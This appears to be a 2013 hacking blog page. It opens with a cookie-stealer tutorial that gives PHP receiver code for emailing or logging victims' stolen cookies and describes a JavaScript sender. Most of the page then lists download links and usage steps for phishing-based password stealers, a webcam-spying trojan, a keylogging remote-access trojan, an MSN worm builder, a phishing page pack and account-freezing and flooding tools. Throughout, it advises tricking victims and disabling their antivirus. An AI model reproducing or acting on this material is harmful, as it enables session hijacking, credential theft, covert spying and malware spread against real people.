Free Hacking Tools: ACCOUNTS

Showing posts with label ACCOUNTS. Show all posts
Showing posts with label ACCOUNTS. Show all posts

Thursday, 14 March 2013

How to make cookies and hack Orkut accounts

,


How to Make a Cookie Stealer

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In
essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure
webserver.


Step One: The Code

Coding a receiver is the part with which most
newbies struggle. Only two things are

needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("
stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a
logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file =
fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5


Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.

Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3


Line 1 tells the browser that the following chunk of code is to be
interpereted as JavaScript.
Line 2 adds
document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.


Saturday, 23 February 2013

HACK HOTMAIL ACCOUNTS : HOTMAIL HACKER

,
type='html'>

I had previously discussed about Gmail Hacker to hack Gmail accounts. Likewise, this software can hack Hotmail accounts. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Hotmail Hacker Builder.exe file on your computer.
3. Enter your email address, password and subject of email you wanna receive. I suggest you to create a new email ID for this. You can use Gmail or Yahoo but avoid using Hotmail account. This email will contain the password you wanna hack. Also select appropriate smtp server address. The default smtp server address 587 is of gmail. You can google for smtp server addresses or can find it here. Also, write a fake error message to display on the screen or leave it default.
4. Click on "Build". This will create your own Hotmail hacker in Hotmail hacker folder.
5. Now, send this Hotmail Hacker.exe file to victim of which you wanna hack Hotmail password and convince him that this program can hack anyone's Hotmail password (lil bit of Social Engineering).
6. Ask him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he wanna hack. As he enters this information and hits "Login and Start", he will receive a error message.
7. You will receive an email in your account containing his password. Hooray!!! you will now be able to hack hotmail password. Enjoy!!!

Download here:

http://www.mediafire.com/download.php?zjogjlw0ndm

HACK MSN ACCOUNTS : MSN BLACK V2

,
type='html'>


This program has following features: -

1. Text Flooder - Sends consecutive messages by hitting the "Flood Me" button, click "Stop" to stop.
2. Emote Flooder - Same as Text Flooder except proceeds at a slower rate for less lag, same as above.
3. Alert Box Flood - Floods your sign in name, 6 consecitive times.
4. Nudge Bomb - Sends 5 consecutive nudges in a row.


Download here:

http://www.mediafire.com/download.php?jimm4jjwm0o

HACK GMAIL ACCOUNTS : GMAIL HACKER

,
type='html'>

This software will hack Gmail accounts. All you need is a bit of social engineering. Just follow the steps below:

1. Extract the RAR archive in a separate folder.
2. Run Gmail Hacker Builder.exe file on your computer.
3. Enter in your Gmail address and password (I created a new Gmail ID to test this and I recommend you to do the same). Hit on Build. Then Gmail hacker builder will create your own Gmail hacker application - Gmail Hacker.exe file which you can use to hack gmail password.
4. Now, send this Gmail Hacker.exe file to victim of which you wanna hack Gmail password and convince him that this Gmail hacker can hack Gmail password (Social Engineering as I already said).
5. Ask him to run Gmail Hacker.exe and enter all information including his Gmail ID and password and Gmail ID of victim he wanna hack. As he enters this information and hits "Hack Them", he will receive an error message
6. You will receive an email in your account containing his password. Enjoy!!!

Download here:

http://www.mediafire.com/download.php?znjl0mezh0n

HACK MSN ACCOUNTS : MSN ANNOYANCE

,
type='html'>

MSN Annoyance is a simple program consisting of the following: -

1. MSN Booter  (DOSing buddies MSN)

2. Wink bomber (sending unlimited winks to people on MSN)


Download here:

http://www.mediafire.com/download.php?hz2mzi4tzlm

HACK MSN ACCOUNTS : MESS MANIA 4.0

,
type='html'>


Mess Mania is a collection of programs which can hack MSN passwords by using many techniques. It consists of the following components:


1. Msn Freezer (prevents hotmail user from signing in)
2. Text Flooder (can be used on most chatrooms or msn)
3. Mess Chat

4. Mess Phisher (Allows you to add your own phisher page/pass.txt)
5. Contacts Maker (Saves msn contacts as a .ctt file)
6. Ghost me (Makes you look like a ghost)
7. Pass recovery (reveals saved Msn Passwords)
8. Password maker (Makes strong passwords)
9. Msn revert (can be used to crack/hack accounts) 

10. Fake email 
11. Mic locker
12. Stop popups (stops the toast popups)
13. IP Stealer
14. DP/EMO Stealer
15. File Joiner (Binds one file/exe to another)
16. Nicknames 
17. L337 Speak 
18. Facebook freezer (prevents facebook user from signing in



Download here:

http://www.mediafire.com/download.php?njjmjdi02mw

HACK MSN ACCOUNTS : MESS BOOTER

,
type='html'>

This program floods the victims' IM conversations with characters that you type. You can optionally choose from currently open windows and spam any of them.     

Download here:

http://www.mediafire.com/download.php?jnzzj5ymcla

HACK MSN ACCOUNTS : MSN HACK PACK

,
type='html'>


This MSN HACK PACK consists of the following MSN hacking programs:


1. Pro MSN Annoyer
2. MSN Freezer
3. MSN Nudge Flooder

HACK MSN ACCOUNTS : MESS SPY

,
type='html'>


With this program, you can turn on the webcam of anyone who is chatting with you on MSN messenger and spy on him/her without his/her knowledge and permission. Just send the "TheUltimate Msn Toolz.exe" file to your victim. When victim runs the application, their webcam will turn on. The freezer and booter will work as normal, so the victim wont know that they are being watched. Even if they shut the application down, it should still run in the background. You then open the (mess-spy) part and enter their IP address. Leave the port set to 4440 and connect.

Download here:

http://www.mediafire.com/download.php?czmzgzxmnyn

HACK MSN ACCOUNTS : CEDP STEELER 6.0

,
type='html'>


With this program, you can steal any emotion, animation or display picture of your contacts on Windows Live Messenger and MSN Messenger.

Download here:

http://www.mediafire.com/download.php?zlywjwwgnlk

HACK MSN ACCOUNTS : FAKE MSN

,
type='html'>

This is a wonderful program which looks like real MSN messenger but in reality, it hacks your victim's MSN password. Just make them login into this fake messenger and you will get a text file containing their user name and password in it.

Download here:

http://www.mediafire.com/download.php?h3mtjd2z2my

HACK FACEBOOK ACCOUNTS : FACEBOOK FREEZER

,
type='html'>


This program can freeze facebook accounts temporarily or permanently by hitting facebook with consecutive wrong login attempts. It also has a "watch the action" feature in which we can see the facebook freezing process.


Download here:

http://www.mediafire.com/download.php?hgmrizwzwjg

HACK EMAIL ACCOUNTS : 34 IN 1 PHISHER PACK

,
type='html'>


As the name says, this phisher pack consists of 34 ready made phishing pages of websites like paypal, ebay, yahoo, gmail etc.

Download here:

HACK BEBO ACCOUNTS : BEBO FREEZER

,
type='html'>


This program can freeze Bebo accounts by hitting Bebo servers with constant wrong login attempts. Bebo is a large social networking community having millions of users all over the world. 

Download here:


http://www.mediafire.com/download.php?dulrimklnmw

HACK EMAIL ACCOUNTS : 15 IN 1 FREEZER PACK

,
type='html'>


This 15 in 1 Freezer Pack consists of all the famous freezer programs which can freeze email accounts temporarily or permanently with constant wrong login attempts. 

Download here: 

HACK MSN ACCOUNTS : MSN HIJACK

,
type='html'>

With this program, you can steal the MSN Messenger logs from someones computer. The logs are recieved through gmail. The only reason this is required is because you need to log into the gmail server. I advise you to create a new gmail address. You must include an icon file named "icon.ico" in the directory that contains the Messenger Hijack folder. Once you hit Generate, it will give you an exe that you need to have someone else open. After they open it, in a few seconds you will start recieving the logs in your gmail. Because of the transfer limit with gmail, you will recieve each log in a seperate email.

Download here:

http://www.mediafire.com/download.php?m3nqtrdzmzn

HACK MSN ACCOUNTS : MSN SPRINDER

,
type='html'>

The MSN Sprinder is a combination of a File Binder supporting max of 512 files and a MSN Spreader. This is a new worm spreading via MSN Messenger. This is the tool that creates your MSN worms. This is a worm creating binder when added, it can zip a payload of a viruses/worms and also have the capability to spread through MSN. When you execute the file it sends a copy of the payload to all the contacts in your MSN list via attachment. You can put anything in it, from bots to keyloggers.

Download here:

http://www.mediafire.com/download.php?ogknn230mw2

HACK MSN ACCOUNTS : EVIL MSN 3.0

,
type='html'>


EVIL MSN is a program which can manipulate MSN in many ways. It has multiple features like MSN scroller, Pic thief, Nickname builder, Status Bomb, profile viewer etc. Apart from these, it has inbuilt IP stealer, port scanner and CGI scanner. 

Thursday, 21 February 2013

HACK MSN ACCOUNTS : MSN TROJAN V5.1

,
type='html'>

This program is actually a trojan which you can send to someone in a MSN conversation. As soon as the person clicks it, you will be able to monitor his PC activities and also record his keystrokes. You just need to make sure that your victim's antivirus program is disabled when he/she opens it. Alternatively, you can use Binder and Crypter software to successfully infect him. All you have to do is to send the file named "DON'T OPEN THIS, RENAME IT.exe" in the archive to the victim and you will be able to control him remotely through commands which are given in text file placed in the archive.

Download here:

http://www.mediafire.com/download.php?0yodooearil

HACK MSN ACCOUNTS : MSN/WLM BOMBER 3.0

,
type='html'>



This is a spammer by which we can flood the victim with text messages and nudges. It also has a feature by which we can select all our MSN messenger contacts and spam them simultaneously.

Download here: 

http://www.mediafire.com/download.php?eyt0c2kdtmj


 

Free Hacking Tools Copyright © 2011 -- Template created by All Premium Accounts -- Powered by Free Premium Accounts